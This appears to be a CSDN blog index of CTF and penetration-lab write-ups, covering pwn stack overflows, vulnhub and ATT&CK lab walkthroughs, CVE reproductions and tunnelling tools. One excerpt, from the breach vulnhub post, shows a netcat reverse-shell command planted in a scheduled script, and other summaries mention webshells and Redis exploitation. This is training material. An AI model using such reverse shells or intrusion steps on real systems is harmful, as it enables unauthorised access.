JM丫-CSDN博客

原创 buuctf-ciscn_2019_es_2(栈迁移)

本文分析了CISC_2019_ES_2的栈溢出漏洞利用方法。由于栈空间限制，无法直接构造ROP链，因此采用栈迁移技术。通过IDA静态分析发现read函数读取0x30字节数据时存在栈溢出漏洞，偏移量为0x2c。利用printf函数泄露ebp地址，计算得到迁移目标地址为ebp-0x38。通过构造payload覆盖ebp并利用leave_ret指令（地址0x08048526）实现栈迁移，为后续ROP链构造创造条件。文中详细介绍了调试过程和利用思路，并提供了部分exploit代码。

2025-12-21 20:46:51 728

原创 buuctf-not_the_same_3dsctf_2016(三种方法)

摘要本文分析了BUUOJ平台上的not_the_same_3dsctf_2016题目，介绍了3种利用手法拿到falg值

2025-12-06 18:49:44 975

原创 buuctf-ciscn_2019_c_1

本文分析了CTF题目ciscn_2019_c_1的64位ELF程序，该程序开启了NX保护。通过IDA静态分析发现程序存在gets函数栈溢出漏洞，s数组长度为0x50，通过填充\x00绕过strlen检查。由于缺少直接可利用的system函数，采用ret2libc攻击方式：首先构造ROP链泄露puts函数地址，计算libc基址；然后二次攻击获取system和/bin/sh地址完成提权。文中详细说明了64位程序传参规则、栈对齐问题解决方案，并提供了完整的Python漏洞利用脚本，包含地址计算、payload构造

2025-11-30 20:25:20 743

原创 ATT＆CK靶机实战系列之vulnstack7(红日7)

本文展示了针对多层网络环境的渗透测试过程。首先利用Redis未授权漏洞获取DMZ区域Ubuntu服务器的SSH访问权限，随后通过分析Nginx配置发现内网Web服务。接着利用Laravel框架漏洞(CVE-2021-3129)在二层网络的Docker容器中植入Webshell，并计划通过Docker逃逸技术进一步渗透。最后使用Metasploit生成木马准备提权，以获取更高权限完成渗透测试。整个过程涉及端口扫描、漏洞利用、权限提升等多个环节，展现了典型的多层网络渗透路径。

2025-11-23 17:16:01 666

原创 bugku--抓到一只苍蝇

本文分析了名为"抓到一只苍蝇"的bugku题目。通过协议分析发现HTTP和TCP数据流，重点追踪了HTTP POST请求，发现传输了一个fly.rar压缩包。通过提取5个数据包，使用dd命令去除364字节多余数据后合并得到完整rar文件。该文件存在RAR伪加密，修改文件头后成功解压，最终从PNG图片中扫描获得flag{m1Sc_oxO2_Fly}。整个过程涉及网络协议分析、数据提取、文件修复和隐写术等技术。

2025-11-23 16:38:06 276

原创 buuctf-pwn1-rip

本文分析了BUUCTF中的pwn1-rip题目。通过checksec和file命令发现这是一个64位动态链接程序，没有任何保护机制。使用IDA Pro分析发现main函数中存在gets漏洞，可向15字节的s数组写入任意数据。通过gdb动态调试确定偏移量为23字节。题目中存在可直接调用的system('/bin/sh')函数，构造payload成功获取shell。此外还介绍了当没有直接调用时如何通过ROPgadget查找pop rdi指令，考虑64位程序的栈对齐问题，构造包含返回地址、pop rdi、/bin

2025-11-23 16:31:16 704

原创内网理论知识总结

无意间看到,发出来分享!

2025-11-19 09:57:21 1598 1

原创攻防世界 Level 1 | 流量分析

提供思路供给喜欢ctf的师傅们!

2025-11-19 09:46:08 224

原创 chisel工具使用

介绍内网工具chisel使用

2025-05-23 11:44:53 915

原创 PWNOS:2.0(vulnhub靶机)

主要是学习渗透测试的思路

2025-04-25 19:00:09 1066

原创 CVE-2017-5645(使用 docker 搭建)

介绍CVE-2017-5645

2025-03-16 13:56:57 610

原创 CVE-2018-2628(使用 docker 搭建)

介绍2018-2628

2025-03-16 13:41:12 604

原创 unserialize3 [有难度,序列化反序列化知识点]

介绍php中的序列化和反序列化

2025-03-16 13:29:32 508

原创 fileinclude [文件包含，代码审计,少许难度 ]

介绍ctf题

2025-03-16 13:19:03 362

原创 CTF WEB题

文件包含，php伪协议

2025-03-16 13:08:23 372

原创 python基础

分享pyhton笔记

2025-03-15 17:48:03 3124

原创 iptables基础

分享笔记

2025-03-15 14:47:20 958

原创 CVE-2017-10271

介绍2017-10271

2025-03-15 14:16:13 439

原创 CVE-2019-11581

介绍2019-11581

2025-03-15 14:13:11 348

原创关于DeepSeek问题

解决DeepSeek的服务器繁忙的问题

2025-02-06 21:23:08 1152

原创 kali安装nessus

写一个关于nessus的安装,供大家学习交流。

2024-11-08 15:05:47 1290 2

原创 HTTP协议详解

HTTP的一些知识点

2024-11-01 09:28:44 940

原创 CSRF与SSRF

介绍CSRF和SSRF

2024-11-01 01:10:21 1844

原创暴力破解漏洞

暴力破解一些工具的简单介绍

2024-10-31 23:43:46 1022

原创文件上传和文件包含

对文件上传和文件包含做了简单的总结

2024-10-31 23:15:26 1434

原创 sql注入

sql注入简单介绍

2024-10-31 22:10:31 1412

原创 c语言基础入门

一些关于c语言的基础入门知识点

2024-10-31 14:41:21 1003

原创 ctfshow web系列

介绍ctfshow中web系列

2024-10-31 13:16:26 2224

原创 FRP内网穿透

通过一个简单的内网穿透来学习frp三层代理是如何使用的,供各位师傅们交流学习!

2024-09-21 15:13:18 1256

原创 EW内网穿透详解!

总结了一下ew的使用,希望可以和师傅们一起交流沟通!

2024-09-20 00:45:42 2348

原创 ATT＆CK靶机实战系列之vulnstack2

ATT&CK系列第2篇，跟师傅们j交流学习！

2024-09-18 17:22:12 1307

原创 sqli-libs通关详解

sql-libs靶场的打靶过程,提供给师傅们一起交流学习!!

2024-07-24 23:19:51 4216 5

原创 ATT＆CK靶机实战系列之vulnstack1

一篇关于红日靶机渗透的文章，主要是想跟各位师傅一起学习一下！

2024-07-08 17:44:07 1018

原创 vlunhub系列之breach靶机

cat shell.txt nc -e /bin/bash 192.168.110.22 5555 将其成功的写入到这个文件中，我们使用/usr/bin/tee目录，将这个文件写入到/usr/share/cleanup/tiduup.sh中。cat /usr/share/cleanup/tidyup.sh nc -e /bin/bash 192.168.110.22 5555 成功的将脚本写入到找个文件中，等待可执行脚本的运行。

2023-08-11 13:11:06 658

原创 vlunhub系列之lampiao靶机

我们可以去找一下这个版本有没有什么可以利用的漏洞，经过我们查阅资料我们发现可以使用脏牛对这个机器进行提权。(Linux为2016年7月更新，可以使用脏牛进行提权 CVE-2016-5195脏牛漏洞范围：Linux kernel>2.6.22 (2007年发行，到2016年10月18日才修复))3.-O2编译器的优化选项的4个级别，-O0表示没有优化,-O1为缺省值，-O3优化级别最高。我们可以利用这个漏洞进行渗透。我们在这里发现一个robots文件，这里存在着一些网页爬虫不可以爬取以及可以爬取的文件。

2023-08-09 00:04:13 245

空空如也

空空如也